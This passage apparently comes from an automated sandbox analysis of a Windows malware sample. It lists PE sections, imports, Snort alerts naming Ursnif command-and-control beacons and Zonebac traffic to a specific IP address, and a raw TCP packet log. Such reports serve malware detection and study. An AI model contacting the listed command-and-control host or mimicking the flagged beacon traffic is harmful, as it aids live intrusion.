| OtycdIdu | 0x27f000 | 0x10649 | 0x10800 | False | 0.418235085227 | data | 5.25113561119 | |
| IbVOTdPC | 0x290000 | 0x4b5 | 0x600 | False | 0.34375 | data | 3.25550625419 | |
| FgFHDyjf | 0x291000 | 0x10775 | 0x10800 | False | 0.400153882576 | data | 4.92204812869 | |
| ybeqBvHg | 0x2a2000 | 0xa663 | 0xa800 | False | 0.433430989583 | data | 5.16751770906 | |
| IbzUQYJs | 0x2ad000 | 0x317f | 0x3200 | False | 0.33484375 | data | 5.16903653942 | |
| AQBgSYnS | 0x2b1000 | 0x3001 | 0x3200 | False | 0.395390625 | data | 5.13205626758 | |
| XxFUmGWX | 0x2b5000 | 0x7fa3 | 0x8000 | False | 0.342498779297 | data | 4.64166784079 | |
| afVQQtfj | 0x2bd000 | 0x1766 | 0x1800 | False | 0.4306640625 | data | 5.22679049555 | |
| nwvMTysA | 0x2bf000 | 0x95de | 0x9600 | False | 0.408567708333 | data | 4.91622055711 | |
| ZHPQhgLD | 0x2c9000 | 0x31ea | 0x3200 | False | 0.443125 | data | 5.40153365825 | |
| pxMMJkwk | 0x2cd000 | 0xf4a0 | 0xf600 | False | 0.285410315041 | data | 4.15839164982 | |
| JXHCNYcJ | 0x2dd000 | 0x645 | 0x800 | False | 0.384765625 | data | 3.87209019024 | |
| lYRopDTG | 0x2de000 | 0x46ef | 0x4800 | False | 0.217881944444 | data | 3.87911693157 | |
| bcYTpMaT | 0x2e3000 | 0xb1b4 | 0xb200 | False | 0.446980337079 | data | 5.30459672358 | |
| nuBezWiu | 0x2ef000 | 0xef16 | 0xf000 | False | 0.266731770833 | data | 4.54407396418 | |
| yPvpmSBg | 0x2fe000 | 0x7d39 | 0x7e00 | False | 0.324776785714 | data | 4.31832937377 | |
| OoEfGgTM | 0x306000 | 0x2239 | 0x2400 | False | 0.461805555556 | data | 4.81294100952 | |
| kYRGCWEC | 0x309000 | 0x13560 | 0x13600 | False | 0.361365927419 | data | 4.61084789586 | |
| ssiFbfZW | 0x31d000 | 0xfd20 | 0xfe00 | False | 0.397991510827 | data | 4.83645609944 | |
| KHKSQqok | 0x32d000 | 0x2e91 | 0x3000 | False | 0.551106770833 | data | 6.15665163676 | |
| NcZcjaDP | 0x330000 | 0x8baf | 0x8c00 | False | 0.358286830357 | data | 4.53824163163 | |
| mIUEylgT | 0x339000 | 0x2abec | 0x2ac00 | False | 0.225660179094 | data | 3.89084100028 | |
| lluFjCpP | 0x364000 | 0x1242 | 0x1400 | False | 0.3734375 | data | 4.01527750922 | |
| BHqNuAAF | 0x366000 | 0x2fe5 | 0x3000 | False | 0.404296875 | data | 5.07399713959 | |
| dWFkhiaJ | 0x369000 | 0xe12b | 0xe200 | False | 0.451552129425 | data | 5.04492106469 | |
| NeKPPFmp | 0x378000 | 0x10dc | 0x1200 | False | 0.41015625 | data | 4.74787400821 | |
| mRaJxCpw | 0x37a000 | 0x2d55 | 0x2e00 | False | 0.40090013587 | data | 5.08071078207 | |
| sjZRApAc | 0x37d000 | 0x51e6 | 0x5200 | False | 0.340224847561 | data | 4.57864669136 | |
| mJuapRBt | 0x383000 | 0x2896 | 0x2a00 | False | 0.399181547619 | data | 5.11002345911 | |
| AUQwTDRB | 0x386000 | 0x6513 | 0x6600 | False | 0.320465686275 | data | 4.31847897425 | |
| Mzpcxreq | 0x38d000 | 0x82bc | 0x8400 | False | 0.261156486742 | data | 3.767572246 | |
| DQLewjlc | 0x396000 | 0x22a9 | 0x2400 | False | 0.397135416667 | data | 5.07745042262 | |
| yQzDovRx | 0x399000 | 0x187 | 0x200 | False | 0.44140625 | data | 2.58744007464 | |
| KsasGyWE | 0x39a000 | 0x341c | 0x3600 | False | 0.452618634259 | data | 4.59764407477 | |
| qALhWEsZ | 0x39e000 | 0x978 | 0xa00 | False | 0.408984375 | data | 4.298132059 | |
| EhLKChYp | 0x39f000 | 0xc9c7 | 0xca00 | False | 0.356725711634 | data | 4.56772549135 | |
| juiuAwmE | 0x3ac000 | 0x805 | 0xa00 | False | 0.3203125 | data | 3.84392745238 | |
| FPCcnPuO | 0x3ad000 | 0x30066 | 0x30200 | False | 0.185328733766 | data | 5.48813033427 | |
| DQPOFovS | 0x3de000 | 0x2e49 | 0x3000 | False | 0.396647135417 | data | 5.03014687317 | |
| eeLebknr | 0x3e1000 | 0x165f | 0x1800 | False | 0.357421875 | data | 3.82572779856 | |

                                                                                                                                                                      Resources

Name | RVA | Size | Type | Language | Country
RT_MANIFEST | 0x3e060 | 0x17d | XML 1.0 document text | English | United States

                                                                                                                                                                      Imports

DLL | Import
KERNEL32.dll | ExitProcess, GetModuleHandleW, WideCharToMultiByte, LoadLibraryW, Sleep, GetModuleFileNameW, GetTempPathW, VirtualProtect, GetCurrentProcessId, EncodePointer, DecodePointer, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, IsProcessorFeaturePresent, GetLastError, GetModuleHandleExW, GetProcAddress, MultiByteToWideChar, HeapSize, HeapFree, HeapAlloc, SetLastError, GetCurrentThreadId, GetProcessHeap, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, GetModuleFileNameA, WriteFile, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EnterCriticalSection, LeaveCriticalSection, LoadLibraryExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, HeapReAlloc, LCMapStringW, OutputDebugStringW, GetStringTypeW, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetStdHandle, SetFilePointerEx, WriteConsoleW, CloseHandle, CreateFileW

                                                                                                                                                                      Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
09/14/21-16:03:19.921633 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49737 | 80 | 192.168.2.6 | 173.239.8.164
09/14/21-16:03:19.921633 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49737 | 80 | 192.168.2.6 | 173.239.8.164
09/14/21-16:03:20.611062 | TCP | 2030821 | ET MALWARE Win32/Zonebac Traffic Redirect | 49737 | 80 | 192.168.2.6 | 173.239.8.164

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      Sep 14, 2021 16:03:24.013890028 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.062239885 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.062272072 CEST44349745168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.063659906 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.063680887 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.102133989 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.123687983 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.124353886 CEST4974780192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.132294893 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.132312059 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.132318974 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.132330894 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.132335901 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.137928009 CEST44349745168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.138694048 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.139177084 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.139184952 CEST44349745168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.148730993 CEST8049748142.250.203.110192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.150055885 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.150072098 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.154473066 CEST8049747142.250.203.110192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.158787012 CEST4974780192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.185957909 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.185991049 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.186017990 CEST8049748142.250.203.110192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.188958883 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.188981056 CEST44349746168.119.139.96192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.193629980 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.193650007 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.193660021 CEST49746443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:24.203008890 CEST8049748142.250.203.110192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.214982033 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:24.260256052 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.264884949 CEST4975080192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.287082911 CEST8049749142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.290128946 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.290153980 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.299031973 CEST8049750142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.304351091 CEST4975080192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.343800068 CEST8049749142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.355325937 CEST8049749142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.355596066 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.360132933 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.360176086 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.360281944 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.361092091 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.361104965 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.441090107 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.445367098 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.450493097 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.450510979 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.450897932 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.450907946 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.453886032 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.454556942 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563153982 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563231945 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563271999 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563276052 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563302040 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563309908 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563328028 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563330889 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563347101 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563354015 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.563385010 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.563412905 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.564670086 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.564768076 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.564779997 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.564824104 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.566828966 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.566937923 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.566951990 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.566994905 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.568979979 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.569061995 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.569076061 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.569117069 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.571098089 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.571188927 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.571198940 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.571240902 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.590122938 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.590245962 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.590264082 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.590311050 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.591016054 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.591094971 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.591104984 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.591145992 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.593240023 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.593303919 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.593317032 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.593358994 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.595355988 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.595423937 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.595434904 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.595694065 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.597529888 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.597606897 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.597616911 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.597660065 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.599653006 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.599750996 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.599764109 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.599813938 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.601557016 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.601612091 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.601622105 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.601713896 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.603427887 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.603497982 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.603507996 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.603557110 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.605134010 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.605211020 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.605221033 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.649763107 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.649811983 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.651834965 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.651896000 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.651906013 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.651942015 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.651949883 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.651956081 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.651993036 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.651998997 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.652043104 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.652074099 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.652121067 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.652127028 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.652215958 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.652225018 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.652394056 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653045893 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653104067 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653112888 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653142929 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653155088 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653162956 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653182030 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653242111 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653879881 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653954029 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.653981924 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.653990984 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.654010057 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.654033899 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.654748917 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.654809952 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.654819012 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.654860973 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.658924103 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.659065962 CEST44349751142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.659141064 CEST49751443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.670753002 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.670795918 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.670870066 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.671591043 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.671602964 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.727396011 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.727478027 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.728662968 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.728681087 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.731370926 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.731390953 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.759036064 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.759085894 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.759181976 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.759973049 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.759988070 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789594889 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789659023 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789669991 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789697886 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789715052 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789747000 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789761066 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789772987 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789798021 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789835930 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.789844990 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.789891958 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.791244984 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.791326046 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.791347027 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.791407108 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.793066978 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.793140888 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.793164015 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.793216944 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.794904947 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.794997931 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.795020103 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.795085907 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.795708895 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.796175957 CEST44349752142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.796272039 CEST49752443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.816658974 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.816756964 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.817169905 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.817178965 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.820198059 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.820221901 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.856297970 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.856349945 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.856420994 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.857116938 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.857141972 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.882395983 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.882474899 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.882502079 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.882551908 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.885431051 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.885555029 CEST44349755142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.885623932 CEST49755443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.914119005 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.914190054 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.921106100 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.921154976 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.924014091 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.924051046 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.975816965 CEST44349757142.250.102.106192.168.2.6
